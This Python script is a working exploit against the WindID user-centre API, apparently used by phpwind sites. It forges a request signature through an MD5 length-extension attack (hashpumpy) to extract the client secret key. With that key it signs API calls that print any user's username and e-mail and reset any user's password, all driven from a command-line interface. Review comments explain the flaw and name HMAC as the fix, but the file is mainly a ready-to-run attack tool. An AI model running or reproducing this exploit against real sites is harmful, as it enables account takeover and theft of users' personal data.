1#!/usr/bin/env python
2# author: RickGray
3# update: 2016-05-25
4# >>>>>>>>>>>
5# requests, hashpumpy modules required
6# : pip install requests hashpumpy
7
8import re
9import json
10import time
11import hashlib
12import argparse
13import operator
14
15import requests
16import hashpumpy
17
18
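def md5(s):
    """Return the lowercase hex MD5 digest of ``str(s)``.

    ``str(s)`` is a byte string on Python 2 but text on Python 3, where
    ``hashlib`` refuses it; text is UTF-8 encoded so the helper works on
    both interpreters with the same result for ASCII input.

    Args:
        s: Any value; it is passed through ``str()`` before hashing.

    Returns:
        The 32-character hexadecimal digest.
    """
    data = str(s)
    if not isinstance(data, bytes):
        # Python 3 only: Python 2's str already is bytes.
        data = data.encode('utf-8')
    return hashlib.md5(data).hexdigest()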
21
22
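def ksort(d):
    """Return the ``(key, value)`` pairs of mapping ``d`` sorted by key.

    Mirrors PHP's ``ksort()`` so parameters are serialised in the order the
    server uses. ``items()`` replaces the Python 2-only ``iteritems()``; the
    result is the same list on both interpreters.

    Args:
        d: Any mapping with an ``items()`` method.

    Returns:
        A list of ``(key, value)`` tuples in ascending key order.
    """
    return sorted(d.items(), key=operator.itemgetter(0))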
26
27
def get_appkey(a, t, s, g, p):
    """Compute the ``windidkey`` request signature used by the WindID API.

    Args:
        a: Client id, as a string.
        t: Timestamp string.
        s: The client secret key.
        g: Mapping of query-string parameters.
        p: Mapping of POST body parameters.

    Returns:
        ``md5(md5(a + '||' + s) + t + ss)`` where ``ss`` is the concatenation
        of ``str(key) + str(value)`` for the key-sorted pairs of ``g`` followed
        by those of ``p``, skipping the keys in the exclusion list below
        (``windidkey``, ``clientid``, ``time``, ... are not part of the
        signed material).
    """
    excluded = ('windidkey', 'clientid', 'time', '_json', 'jcallback',
                'csrf_token', 'Filename', 'Upload', 'token', '__data')
    parts = []
    # Query parameters first, then body parameters, each in key order.
    for pairs in (ksort(g), ksort(p)):
        for key, value in pairs:
            if key in excluded:
                continue
            parts.append(str(key) + str(value))
    serialised = ''.join(parts)
    return md5(md5(a + '||' + s) + t + serialised)
44
45
def get_clientid_and_secretkey(t, c):
    """Scrape the WindID hand-off parameters from the avatar page and request the client secret.

    Args:
        t: Base URL of the target site (paths are appended directly, so no
           trailing slash).
        c: Raw ``Cookie`` header value of an authenticated session.

    Returns:
        ``(clientid, secretkey)`` on success; ``None`` when uid, windidkey,
        time or clientid is missing from the page. The ``__main__`` caller
        tuple-unpacks the result, so the ``None`` case surfaces there as a
        ``TypeError`` caught by its broad ``except``.

    Raises:
        Transport errors from ``requests``; ``ValueError`` if the reply is not
        JSON; ``KeyError`` if it carries no ``secretkey`` member.

    NOTE(review): Python 2 only as written (``.encode('hex')``, regexes run
    over the raw ``.content`` byte string).
    NOTE(review): the signature being extended is a plain hash over
    secret-prefixed data; a keyed MAC (HMAC) is the standard mitigation for
    length extension. The scraped ``time`` value is reused verbatim, which
    suggests the server does not enforce timestamp freshness — confirm.
    """
    # Each helper pulls one URL-encoded parameter (%26 is '&', %3D is '=')
    # out of the page text and returns None when the pattern is absent.
    def fetch_uid(p):
        pattern = r'%26uid%3D(?P<uid>[0-9]{1,})%26'
        result = re.search(pattern, p)
        return result.group('uid') if result else None

    def fetch_windidkey(p):
        pattern = r'%26windidkey%3D(?P<windidkey>[a-f0-9]{32})'
        result = re.search(pattern, p)
        return result.group('windidkey') if result else None

    def fetch_time(p):
        pattern = r'%26time%3D(?P<time>[0-9]+)%26'
        result = re.search(pattern, p)
        return result.group('time') if result else None

    def fetch_clientid(p):
        pattern = r'%26clientid%3D(?P<clientid>.*?)%26'
        result = re.search(pattern, p)
        return result.group('clientid') if result else None

    # The avatar page embeds the WindID hand-off URL carrying the values.
    _ = t + '/index.php?m=profile&c=avatar&_left=avatar'
    text = requests.get(_, headers={'Cookie': c}).content

    uid = fetch_uid(text)
    windidkey = fetch_windidkey(text)
    rtime = fetch_time(text)
    clientid = fetch_clientid(text)

    if uid and windidkey and rtime and clientid:
        print('[*] uid = %s' % uid)
        print('[*] windidkey = %s' % windidkey)
        print('[*] time = %s' % rtime)
        print('[*] clientid = %s' % clientid)

        # Presumably the material the server signed for the avatar request:
        # time followed by the key-sorted key/value pairs (same layout as
        # get_appkey) — verify against the server side.
        origin = rtime + 'adoAvatarcavatarmapitypeflashuid{}uidundefined'.format(uid)
        # a=get&c=app&m=api&id=1 str.=key+val ksort($POST)
        padding = 'agetcappid1mapi'
        # Length-extension step: hashpumpy takes the scraped digest, the
        # original data, the data to append and a key length (32 here).
        fakehash, fakedata = hashpumpy.hashpump(windidkey, origin, padding, 32)
        print('[*] fakehash = %s' % fakehash)
        print('[*] fakedata = 0x%s' % fakedata.encode('hex'))  # Python 2 only
        __ = t + '/windid/index.php'
        # The glue bytes (\x80 ... \x00) from fakedata are sent as the value of
        # a parameter named after the signed string minus its time prefix;
        # time and clientid are re-sent as scraped.
        params = {
            origin.replace(rtime, ''): re.search(r'(\x80.*\x00)', fakedata).group(1),
            'clientid': clientid,
            'time': rtime,
            'windidkey': fakehash,
        }
        data = dict(a='get', c='app', id='1', m='api')
        response = requests.post(__,
                                 params=params,
                                 data=data, headers={'Cookie': c})
        print('[*] content = %s' % response.content)
        secret = json.loads(response.content)['secretkey']
        return clientid, secret
    else:
        print('error in fetch data with content')
        return None
104
105
def fetch_user_info(t, clientid, secret, uid):
    """Query the WindID user API for ``uid`` and print the username and e-mail.

    Args:
        t: Base URL of the target site.
        clientid: WindID client id (stringified before signing).
        secret: The client secret key used to sign the request.
        uid: Id of the user record to fetch.

    Returns:
        None; the result is only printed.

    Raises:
        ``ValueError`` if the reply is not JSON; ``KeyError`` if it lacks
        ``username`` or ``email`` (e.g. an error payload — not handled here).
    """
    _ = t + '/windid/index.php'
    # A fresh timestamp is part of the signed material.
    ctime = str(int(time.time()))
    params = {
        'userid': uid,
        'time': ctime,
        'clientid': clientid
    }
    data = dict(a='get', c='user', m='api')
    # Sign query + body with the secret; the signature travels as the
    # windidkey query parameter (get_appkey excludes clientid/time itself).
    appkey = get_appkey(str(clientid), ctime, secret, params, data)
    params['windidkey'] = appkey
    response = requests.post(_, params=params, data=data)
    infos = json.loads(response.content)
    username = infos['username']
    email = infos['email']

    print('[*] uid = %s' % uid)
    print('[^] >>>>>>>>> username = %s' % username)
    print('[^] email = %s' % email)
125
126
def change_user_password(t, clientid, secret, uid, password):
    """Call the WindID ``editUser`` API to set a new password for ``uid``.

    Prints the current user record first via ``fetch_user_info`` (which
    raises if that lookup fails, so the edit is then never attempted).

    Args:
        t: Base URL of the target site.
        clientid: WindID client id (stringified before signing).
        secret: The client secret key used to sign the request.
        uid: Id of the user to modify.
        password: The new password value.

    Returns:
        The raw response body; the ``__main__`` caller treats ``'1'`` as success.
    """
    fetch_user_info(t, clientid, secret, uid)

    _ = t + '/windid/index.php'
    ctime = str(int(time.time()))
    params = {
        'time': ctime,
        'clientid': clientid
    }
    # uid and password are body fields and, not being excluded by
    # get_appkey, are covered by the signature.
    data = dict(uid=uid, a='editUser', c='user', m='api', password=password)
    appkey = get_appkey(str(clientid), ctime, secret, params, data)
    params['windidkey'] = appkey
    response = requests.post(_, params=params, data=data)

    return response.content
142
143
def parse_args():
    """Build the command-line interface and parse ``sys.argv``.

    Two sub-commands are defined: ``getsecret`` (``-c/--cookie``) and
    ``chpass`` (``-i/--clientid``, ``-s/--secretkey``, ``-u/--uid``,
    ``-p/--password``). The positional ``TARGET`` belongs to the top-level
    parser and is defined after the sub-parsers, so it is given last.

    Returns:
        The ``argparse.Namespace``; ``mode`` holds the sub-command name.
    """
    parser = argparse.ArgumentParser()
    modes = parser.add_subparsers(dest='mode')

    secret_cmd = modes.add_parser('getsecret', help='get secret key value')
    secret_cmd.add_argument('-c', '--cookie', dest='COOKIE', type=str,
                            help='the cookie logined with any user')

    chpass_cmd = modes.add_parser('chpass',
                                  help='change user password with secret key')
    chpass_options = (
        (('-i', '--clientid'), 'CLIENTID', int, 'the clientid windid used'),
        (('-s', '--secretkey'), 'SECRETKEY', str, 'the client secret key used'),
        (('-u', '--uid'), 'UID', int, 'the user uid you want to change'),
        (('-p', '--password'), 'PASSWORD', str, 'the password you want to change'),
    )
    for flags, dest, kind, text in chpass_options:
        chpass_cmd.add_argument(*flags, dest=dest, type=kind, help=text)

    parser.add_argument(dest='TARGET', type=str)

    return parser.parse_args()
166
167
if __name__ == '__main__':
    # Entry point: dispatch on the sub-command chosen in parse_args().
    args = parse_args()

    if args.mode == 'getsecret':
        target = args.TARGET
        cookie = args.COOKIE
        try:
            # get_clientid_and_secretkey returns None on a scrape failure;
            # unpacking it then raises TypeError, which the except below
            # reports as a generic failure rather than a missing-value error.
            cid, secretkey = get_clientid_and_secretkey(target, cookie)
            if cid and secretkey:
                print('')
                print('[^] >>>>>>>>> secretkey = %s' % secretkey)
                print('[^] clientid = %s' % cid)
        except Exception as ex:
            # Broad catch: transport, JSON and lookup errors all land here.
            print('failed get secretkey, ("{}")'.format(str(ex)))
    elif args.mode == 'chpass':
        target = args.TARGET
        cid = args.CLIENTID
        key = args.SECRETKEY
        u = args.UID
        pp = args.PASSWORD
        try:
            res = change_user_password(target, cid, key, u, pp)
            # The raw response body is compared to '1' for success; any other
            # body is silently treated as not-successful (nothing is printed).
            if res == '1':
                print('')
                print('[^] >>>>>>>>> succeed!')
                print('[^] password = %s' % pp)
        except Exception as ex:
            print('failed change user password, ("{}")'.format(str(ex)))